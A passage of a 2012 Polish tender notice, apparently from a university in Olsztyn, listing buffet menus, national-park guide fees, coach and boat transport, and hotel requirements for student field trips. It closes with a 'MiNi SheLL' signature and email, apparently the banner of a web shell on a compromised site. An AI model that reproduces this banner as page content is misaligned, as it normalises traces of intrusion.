- wędliny (różnorodne, minimum 5 rodzajów)
- sery (różnorodne- żółte, pleśniowe, białe) 
- warzywa (świeże i konserwowe)
- pieczywo (różnorodne- jasne, ciemne, bagietki)
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, z mlekiem)
herbata (różnorodna- czarna, zielona, owocowa) woda (gazowana i niegazowana), soki owocowe
b) drugiego dnia: śniadanie w formie bufetu bez ograniczeń ilościowych (w ilości adekwatnej do liczby uczestników) :
- posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
- wędliny (różnorodne- minimum 5 rodzajów)
- sery (różnorodne- żółte, pleśniowe, białe)
- dżemy
- jajka
- płatki śniadaniowe, muesli
- mleko (ciepłe i zimne)
- jogurty
- świeże owoce
- pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, z mlekiem)
herbata (różnorodna: czarna, zielona, owocowa) woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)

c) drugiego dnia: zapewnienie dla każdego uczestnika suchego prowiantu na podróż obejmującego: woda niegazowana 0,5l w plastikowej butelce, fanta 0,5l, jabłko, rogal typu seven days lub równoważny, bułka z sałatą i żółtym serem, bułka z sałatą, szynką i pomidorem

d) drugiego dnia: obiad w formie bufetu (w ilości adekwatnej do liczby uczestników) :
- zupa
- ryba lub danie mięsne do wyboru
- dodatki (ziemniaki lub frytki)
- surówki
- deser - dwa ciasta do wyboru
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, z mlekiem) herbata (różnorodna: czarna, zielona, owocowa) woda, sok owocowy
3.	Świadczenie usług żywienia odbywać powinno się wg ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006r. Nr 171 poz. 1225 z późn. zm.).
4		Zorganizowanie wstępu i wynajęcie przewodnika po terenach obiektów chronionych Słowińskiego Parku Narodowego podczas 2-dniowej sesji terenowej warsztatów

1.	Szacunkowy termin świadczenia usługi maj-czerwiec 2012. Dokładny termin będzie określony przez Zamawiającego na minimum 14 dni przed wyjazdem.
2.	Opłaty za wstęp i przewodnika obejmują koszty związane z pobytem na terenie Słowińskiego Parku Narodowego (SPN), w tym przynajmniej:
a).  opłata za wstęp do SPN w obwodzie ochronnym Rąbka - wejście na wydmy
b). opłata za wstęp i przewodnika do Muzeum Przyrodniczego w Rąbce
c). opłata za wstęp i przewodnika do Muzeum Przyrodniczego w Smołdzinie (dla 22 osób)
d). opłata za edukacyjną projekcję multimedialną dla BO z pokazem slajdów do 2 godzin
e). Opłata za wstęp i przewodnika po ścieżce edukacyjnej Rowokół wraz z opłatą na wejście na wieżę widokową Rowokół
3.	Wykonawca zapewni zakup biletów na wstęp (zdefiniowany powyżej) i wynajmie przewodnika dla 20 studentów/-tek oraz 2 opiekunów (pracowników Uniwersytetu).

5		Zorganizowanie przejazdu dwudziestu uczestników/-czek i dwóch opiekunów 3-dniowych zajęć terenowych

1.	Szacunkowy termin świadczenia usługi maj-czerwiec 2012. Dokładny termin będzie określony przez Zamawiającego na minimum 14 dni przed wyjazdem.
2.	Zorganizowanie przejazdu autokarem klimatyzowanym według poniższej trasy: 
Dzień pierwszy: Olsztyn - Zezuj - Malinowo - źródła rzeki Łyny - Dorotowo - Łajsy - Gierzwałd - Żabi Róg - Kretowiny; nocleg w Kretowinach; Długość trasy - 280 km 
Dzień drugi: Kretowiny - Budwity (rezerwat Zielony Mechacz) - Buczyniec - Rezerwat jezioro Drużno - Jegłownik - Fiszewo - Elbląg- Mierzeja Wiślana; Długość trasy - 200 km
Dzień trzeci: Mierzeja Wiślana - Gdańsk-Wiślinka - Gniew - Olsztyn 
Długość trasy - około 320 km
Należy uwzględnić w autobusie miejsce na sprzęt terenowy (łopaty, świdry, cylinderki metalowe o pojemności 100 cm3 i 250 cm3). Autokar powinien posiadać czynną toaletę i GPS/mapę (nawigację satelitarną).  W usługę transportową należy wliczyć nocleg i wyżywienie kierowcy.

6		Transport statkiem dwudziestu uczestników/-czek i dwóch opiekunów podczas 3-dniowych zajęć terenowych

1.	Szacunkowy termin świadczenia usługi maj-czerwiec 2012. Dokładny termin będzie określony przez Zamawiającego na minimum 14 dni przed wyjazdem.
2.	Transport statkiem krajoznawczym Żeglugi Ostródzko-Elbląskiej na trasie Buczyniec - Elbląg dla 20 studentów/studentek i 2 opiekunów.

7		Zorganizowanie zakwaterowania dwudziestu uczestników/-czek i dwóch opiekunów podczas 3-dniowych zajęć terenowych

1.	Szacunkowy termin świadczenia usługi maj-czerwiec 2012. Dokładny termin będzie określony przez Zamawiającego na minimum 14 dni przed wyjazdem.
2.	Ilość uczestników: 20 studentów/-ek i 2 opiekunów
3.	Zapewnienie 2 noclegów: pierwszego w miejscowości Kretowiny, drugiego w miejscowości Stare Pole w pensjonacie lub hotelu o standardzie minimum ***(trzy gwiazdki zgodnie z rozporządzeniem w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie) z restauracją i zabezpieczenie 11 pokoi dwuosobowych dla studentów i studentek oraz opiekunów. Pokoje powinny być wyposażone w pełny węzeł sanitarny (z całodobowym dostępem do zimnej i ciepłej wody) i telewizor oraz powinny mieć zapewniony dostęp do internetu (przewodowy lub wi-fi). 

8		Zorganizowanie wyżywienia dwudziestu uczestników/-czek i dwóch opiekunów podczas 3-dniowych zajęć terenowych

1.	Szacunkowy termin świadczenia usługi maj-czerwiec 2012. Dokładny termin będzie określony przez Zamawiającego na minimum 14 dni przed wyjazdem.
2.	pierwszego dnia: obiad w zajeździe przy trasie 51, 2 km od Olsztynka  
- zupa
- ryba lub danie mięsne do wyboru
- dodatki (ziemniaki lub frytki)
- surówki
- deser - dwa ciasta do wyboru
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, z mlekiem) herbata (różnorodna: czarna, zielona, owocowa) woda, sok owocowy
3.	pierwszego dnia: kolacja w miejscu noclegu w Kretowinach dla 20 studentów/-ek i 2 opiekunów w formie bufetu bez ograniczeń ilościowych (w ilości adekwatnej do liczby uczestników): obejmująca:
- danie na ciepło (3 do wyboru)
- wędliny (różnorodne, minimum 5 rodzajów)
- sery (różnorodne- żółte, pleśniowe, białe) 
- warzywa (świeże i konserwowe)
- pieczywo (różnorodne- jasne, ciemne, bagietki)
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, z mlekiem)
herbata (różnorodna- czarna, zielona, owocowa) woda (gazowana i niegazowana), soki owocowe; 
- lub kolacja w formie ogniska (w sprzyjających warunkach pogodowych) z daniami na ciepło (bigos, kiełbaski), pieczywem (różnorodne- jasne, ciemne, bagietki) i napojami: kawa (różnorodna- z expresu, rozpuszczalna, z mlekiem)
4.	drugiego dnia: śniadanie w miejscu noclegu w Kretowinach w formie bufetu bez ograniczeń ilościowych (w ilości adekwatnej do liczby uczestników):
- posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
- wędliny (różnorodne- minimum 5 rodzajów)
- sery (różnorodne- żółte, pleśniowe, białe)
- dżemy
- jajka
- płatki śniadaniowe, muesli
- mleko (ciepłe i zimne)
- jogurty
- świeże owoce
- pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, z mlekiem)
herbata (różnorodna: czarna, zielona, owocowa) woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
5.	drugiego dnia: obiad podczas rejsu statkiem na trasie kanału Elbląsko-Ostródzkiego, wybór dań z karty na statku 
6.	drugiego dnia: kolacja w miejscu noclegu w Starym Polu dla 20 studentów/-ek i 2 opiekunów w formie bufetu lub na wolnym powietrzu (w sprzyjających warunkach pogodowych) (w ilości adekwatnej do liczby uczestników) obejmująca:
- danie na ciepło (3 do wyboru)
- wędliny (różnorodne, minimum 5 rodzajów)
- sery (różnorodne- żółte, pleśniowe, białe) 
- warzywa (świeże i konserwowe)
- pieczywo (różnorodne- jasne, ciemne, bagietki)
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, z mlekiem)
herbata (różnorodna- czarna, zielona, owocowa) woda (gazowana i niegazowana), soki owocowe
7.	trzeciego dnia: śniadanie w miejscu noclegu w Starym Polu w formie bufetu bez ograniczeń ilościowych (w ilości adekwatnej do liczby uczestników) :
- posiłek na ciepło (3 rodzaje do wyboru, np. jajecznica, parówki, kiełbaski)
- wędliny (różnorodne- minimum 5 rodzajów)
- sery (różnorodne- żółte, pleśniowe, białe)
- dżemy
- jajka
- płatki śniadaniowe, muesli
- mleko (ciepłe i zimne)
- jogurty
- świeże owoce
- pieczywo (różnorodne- jasne, ciemne, croissanty, bagietki)
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, z mlekiem)
herbata (różnorodna: czarna, zielona, owocowa) woda (gazowana i niegazowana)
soki owocowe (minimum trzy rodzaje) napoje bezalkoholowe gazowane (minimum trzy rodzaje)
8.	trzeciego dnia: obiad w Kątach Rybackich w restauracji 
- zupa
- ryba lub danie mięsne do wyboru
- dodatki (ziemniaki lub frytki)
- surówki
- deser - dwa ciasta do wyboru
- napoje: kawa (różnorodna- z expresu, rozpuszczalna, z mlekiem) herbata (różnorodna: czarna, zielona, owocowa) woda, sok owocowy
9.	Świadczenie usług żywienia odbywać powinno się wg ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006r. Nr 171 poz. 1225 z późn. zm.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 60.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sukcesywne usługi hotelowe z wyżywieniem dla zaproszonych specjalistów i naukowców prowadzących wykłady zamawiane i Szkolenia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1		Zakwaterowanie w pokoju jednoosobowym:

1). Termin świadczenia usług sukcesywnych: 1.04.2012 - 31.12.2012 r.
2). Miejsce świadczenia usługi: Olsztyn. 
3). Warunki zakwaterowania prowadzącego: pokój jednoosobowy w hotelu, posiadającym standard nie mniejszy niż określony dla hoteli zaszeregowanych do kategorii ***(trzy gwiazdki) zgodnie z rozporządzeniem w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie.
4). Jeżeli odległość hotelu/restauracji od miejsca odbywania wykładów/warsztatów/szkoleń - Kortowo Plac Łódzki 5, będzie większa niż 2000 m, dostawca usługi na własny koszt zorganizuje transport dla wykładowcy.
5). Zamówienie dotyczy zakwaterowania kilku osób. Każda z tych osób będzie korzystała z zakwaterowania i wyżywienia w innym terminie, który Zamawiający poda najpóźniej na 14 dni przed planowaną rezerwacją.
6). Rozliczenie nastąpi według liczby faktycznie wykorzystanych posiłków i osobodni zakwaterowania. Zamawiający zastrzega możliwość zmniejszenia liczby uczestników korzystających z posiłków oraz z zakwaterowania. 
2		Wyżywienie - wariant A: dwa obiady, kolacja, śniadanie:

1). Termin świadczenia usług sukcesywnych: 1.04.2012 - 31.12.2012 r.
2). Miejsce świadczenia usługi: Olsztyn. 
3). Całodzienne wyżywienie - posiłki pełnoporcjowe według menu, tradycyjna kuchnia polska i europejska, restauracja w miejscu zakwaterowania (hotelu).
4). Wariant A: obiad, kolacja - w dniu przyjazdu, śniadanie i obiad w drugim dniu (liczone według zasady: 2 obiady + 1 kolacja + 1 śniadanie = 1 osobodzień)
5). Jeżeli odległość hotelu/restauracji od miejsca odbywania wykładów/warsztatów/szkoleń - Kortowo Plac Łódzki 5, będzie większa niż 2000 m, dostawca usługi na własny koszt zorganizuje transport dla wykładowcy.
6). Zamówienie dotyczy całodziennego wyżywienia kilku osób. Każda z tych osób będzie korzystała z wyżywienia w innym terminie, który zamawiający poda najpóźniej na 14 dni przed planowaną rezerwacją.
7). Rozliczenia nastąpi według liczby faktycznie wykorzystanych posiłków i osobodni zakwaterowania. Zamawiający zastrzega możliwość zmniejszenia liczby uczestników korzystających z posiłków oraz z zakwaterowania.
8). Świadczenie usług żywienia odbywać powinno się wg ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006r. Nr 171 poz. 1225 z późn. zm.).

3		Wyżywienie - wariant B: śniadanie, kolacja:

1). Termin świadczenia usług sukcesywnych: 1.04.2012 - 31.12.2012 r.
2). Miejsce świadczenia usługi: Olsztyn. 
3). Posiłki pełnoporcjowe według menu, tradycyjna kuchnia polska i europejska, restauracja w miejscu zakwaterowania (hotelu).
4). Wariant B: śniadania i kolacje (bez obiadu), przez maksymalnie pięć kolejnych dni, dla jednej osoby (w tym wariancie liczone według zasady: 1 obiad + 1 kolacja = 1 osobodzień) 
5). Jeżeli odległość hotelu/restauracji od miejsca odbywania wykładów/warsztatów/szkoleń - Kortowo Plac Łódzki 5, będzie większa niż 2000 m, dostawca usługi na własny koszt zorganizuje transport dla wykładowcy.
6). Zamówienie dotyczy zakwaterowania jednej osoby przez maksymalnie 5 dób hotelowych w okresie września 2012 r. Dokładny termin zakwaterowania Zamawiający poda najpóźniej na 14 dni przed planowaną rezerwacją.
7).Rozliczenie nastąpi według faktycznej liczby wykorzystanych posiłków i osobodni zakwaterowania. Zamawiający zastrzega możliwość zmniejszenia liczby uczestników korzystających z posiłków oraz z zakwaterowania.
8). Świadczenie usług żywienia odbywać powinno się wg ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006r. Nr 171 poz. 1225 z późn. zm.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 60.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sukcesywne świadczenie usług autokarowego przewozu studentów i studentek z Olsztyna na miejsce ćwiczeń terenowych i z powrotem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.
	WARIANT odległościowy nr 1 - Przewóz osób na odległość jednorazowego przejazdu większą niż 50 km, ale mniejszą lub równą 100 km (licząc w obie strony).

Wymagania dodatkowe:
1.	Liczba osób w jednorazowym przejeździe: przeciętnie 40, max. 48.
2.	Wyjazdy odbywać się będą w ciągu jednego dnia, przy czym maksymalny łączny czas postojów związanych z odbywaniem się ćwiczeń terenowych wynosić będzie 5 godzin (przeciętnie 3 godziny). Zastrzega się możliwość kilkukrotnych postojów w ciągu jednego wyjazdu. 
3.	Początek trasy: Olsztyn-Kortowo, teren UWM w Olsztynie.
4.	Dojazd do miejsca docelowego odbywać się będzie drogami publicznymi. 
5.	Autokar wyposażony powinien być w klimatyzację i ogrzewanie, mikrofon z systemem nagłaśniającym dla opiekuna grupy, toaletę, barek do przygotowywania gorących napojów.
6.	Wykonawca zobowiązany jest do ponoszenia wszelkich kosztów związanych z eksploatacją i używaniem autokaru oraz kosztów postoju na parkingach płatnych.
7.	Każdorazowo przed wyruszeniem w trasę, Zamawiający zastrzega sobie prawo do zbadania stanu technicznego autokaru, trzeźwości kierowcy, jak również sprawdzenia wszelkich dokumentów wynikających z przepisów kodeksu ruchu drogowego i ustawy o transporcie drogowym.
8.	W przypadku awarii środka transportu Wykonawca zapewni na własny koszt zastępczy środek transportu. Zamawiający nie będzie ponosił z tego tytułu żadnych dodatkowych kosztów.
9.	Zamawiający poinformuje Wykonawcę o terminie każdego z wyjazdów na minimum 14 dni przed planowaną datą wyjazdu. 
10.	Termin realizacji usług przewozowych: W ciągu 12 miesięcy od podpisania umowy. 
	



1	km
2.	WARIANT odległościowy nr 2 - Przewóz osób na odległość jednorazowego przejazdu większą niż 100 km, ale mniejszą lub równą 200 km (licząc w obie strony).

Pozostałe wymagania - jak w pozycji nr 1
	

1	
km


3.	WARIANT odległościowy nr 3 - Przewóz osób na odległość jednorazowego przejazdu większą niż 200 km, ale mniejszą lub równą 400 km (licząc w obie strony).

Pozostałe wymagania - jak w pozycji nr 1
	

1	

km Zamawiający zastrzega możliwość wykorzystania środków przeznaczonych na realizację zadania w zakresie  przewozu osób w jednym lub dwóch lub trzech wariantach odległościowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com